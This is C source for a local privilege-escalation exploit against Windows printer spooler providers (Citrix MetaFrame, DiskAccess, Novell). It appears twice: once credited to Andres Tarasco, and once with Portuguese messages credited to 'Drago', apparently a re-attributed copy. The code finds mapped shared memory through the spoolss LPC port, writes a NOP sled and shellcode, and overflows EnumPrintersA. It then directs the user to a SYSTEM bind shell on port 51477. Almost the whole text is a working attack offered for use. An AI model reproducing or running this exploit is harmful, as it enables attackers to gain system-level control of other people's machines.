int main(int argc, char* argv[])
{
unsigned char exploit[BOFSIZE];
unsigned char buffer[REQUIRED_SIZE];
DWORD dwSizeNeeded,n=0;
DWORD datalen=REQUIRED_SIZE;
LARGE_INTEGER dirs;
HANDLE hProcess;
DWORD write;
char *p,i;
#define lpLocalAddress dirs.LowPart
#define lpTargetAddress dirs.HighPart
printf("[+] Universal exploit for printer spooler providers\n");
printf("[+] Some Citrix metaframe, DiskAccess and Novel versions are affected\n");
printf("[+] Exploit by Andres Tarasco - [email protected]\n\n");
printf("[+] Connecting to spooler LCP port \\RPC Control\\spoolss\n");
do {
dirs=ConnectToLPCPort();
printf("[+] Trying to locate valid address: Found 0x%8.8x after %i tries\r",lpTargetAddress,n+1);
if (lpLocalAddress==0) {
printf("\n[-] Unable to connect to spooler LPC port\n");
printf("[-] Check if the service is running\n");
exit(0);
}
i=lpTargetAddress>>24; // & 0xFF000000 == 0
n++;
if (n==MAXLOOPS) {
printf("\n[-] Unable to locate a valid address after %i tries\n",n);
printf("[?] Maybe a greater REQUIRED_SIZE should help. Try increasing it\n");
return(0);
}
} while (i!=0);
//printf(" (%i tries)\n",n);
printf("\n");
printf("[+] Mapped memory. Client address: 0x%8.8x\n",lpLocalAddress);
printf("[+] Mapped memory. Server address: 0x%8.8x\n",lpTargetAddress);
i=(lpTargetAddress<<8)>>24;
//Fill all with rets. who cares where is it.
memset(exploit,i,sizeof(exploit));
exploit[sizeof(exploit)-1]='\0';
/*
memset(exploit,'A',sizeof(exploit)-1);
exploit[262]= (lpTargetAddress<<8)>>24; //EIP for Diskaccess
exploit[263]= (lpTargetAddress<<8)>>24; //EIP for Diskaccess
exploit[264]='\0';
*/
printf("[+] Targeting return address to : 0x00%2.2X00%2.2X\n",exploit[262],exploit[262]);
p=(char *)lpLocalAddress;
memset(&buffer[0],0x90,REQUIRED_SIZE);
memcpy(&buffer[REQUIRED_SIZE -sizeof(shellcode)-10],shellcode,sizeof(shellcode));
printf("[+] Writting to shared memory...\n");
if ( (hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId()))!= NULL )
{
if ( WriteProcessMemory( hProcess, p, &buffer[0], REQUIRED_SIZE, &write )!=0 )
{
printf("[+] Written 0x%x bytes \n",write);
printf("[+] Exploiting vulnerability....\n");
printf("[+] Exploit complete. Now try to connect to 127.0.0.1:51477\n");
printf("[+] and check if you are system =)\n");
EnumPrintersA ( PRINTER_ENUM_NAME, (char *)exploit, 1, NULL, 0, &dwSizeNeeded, &n );
return(1);
} else {
printf("[-] Written 0x%x bytes \n",write);
}
}
printf("[-] Something failed. Error %i - Good luck next time\n",GetLastError());
return(0);
}
int main(int argc, char* argv[])
{
unsigned char exploit[BOFSIZE];
unsigned char buffer[REQUIRED_SIZE];
DWORD dwSizeNeeded,n=0;
DWORD datalen=REQUIRED_SIZE;
LARGE_INTEGER dirs;
HANDLE hProcess;
DWORD write;
char *p,i;
#define lpLocalAddress dirs.LowPart
#define lpTargetAddress dirs.HighPart
printf("[+] Exploit universal para provedores de impressão\n");
printf("[+] Talvez o Citrix metaframe, DiskAccess ou Novel suas versões foram afetadas\n");
printf("[+] Exploit by Drago\n\n");
printf("[+] Conectando a porta de spooler LCP \\RPC Control\\spoolss\n");
do {
dirs=ConnectToLPCPort();
printf("[+] Tente localizar um endereço valido: Encontrados 0x%8.8x após %i tentativas\r",lpTargetAddress,n+1);
if (lpLocalAddress==0){
printf("\n[-] Não foi possivel se conectar a porta de spooler LPC\n");
printf("[-] Verifique se o serviço está rodando\n");
exit(0);
}
i=lpTargetAddress>>24; // & 0xFF000000 == 0
n++;
if (n==MAXLOOPS) {
printf("\n[-] Não é possível localizar um endereço válido após %i tries\n",n);
printf("[?] Talvez o valor REQUIRED_SIZE deve ajudar. Tente aumenta-lo\n");
return(0);
}
}while (i!=0);
//printf(" (%i tries)\n",n);
printf("\n");
printf("[+] Memoria mapeada. Endereço do cliente: 0x%8.8x\n",lpLocalAddress);
printf("[+] Memoria mapeada. Endereço do servidor: 0x%8.8x\n",lpTargetAddress);
i=(lpTargetAddress<<8)>>24;
//Preencha tudo com os rets. Eu não ligo pra onde eles estão.
memset(exploit,i,sizeof(exploit));
exploit[sizeof(exploit)-1]='\0';
/*
memset(exploit,'A',sizeof(exploit)-1);
exploit[262]= (lpTargetAddress<<8)>>24; //EIP for Diskaccess
exploit[263]= (lpTargetAddress<<8)>>24; //EIP for Diskaccess
exploit[264]='\0';
*/
printf("[+] Alvejando o endereço de retorno para : 0x00%2.2X00%2.2X\n",exploit[262],exploit[262]);
p=(char *)lpLocalAddress;
memset(&buffer[0],0x90,REQUIRED_SIZE);
memcpy(&buffer[REQUIRED_SIZE -sizeof(shellcode)-10],shellcode,sizeof(shellcode));
printf("[+] Escrevendo memória compartilhada...\n");
if ( (hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId()))!= NULL )
{
if ( WriteProcessMemory( hProcess, p, &buffer[0], REQUIRED_SIZE, &write )!=0 )
{
printf("[+] Ecrever 0x%x bytes \n",write);
printf("[+] Explorando vulnerabilidade....\n");
printf("[+] Exploit completo. Agora tente conectar a 127.0.0.1:51477\n");
printf("[+] e verifique se você é o sistema =)\n");
EnumPrintersA ( PRINTER_ENUM_NAME, (char *)exploit, 1, NULL, 0, &dwSizeNeeded, &n );
return(1);
} else {
printf("[-] Escrito 0x%x bytes \n",write);
}
}
printf("[-] Alguma coisa deu errado. Error %i - Boa sorte na proxima\n",GetLastError());
return(0);
}
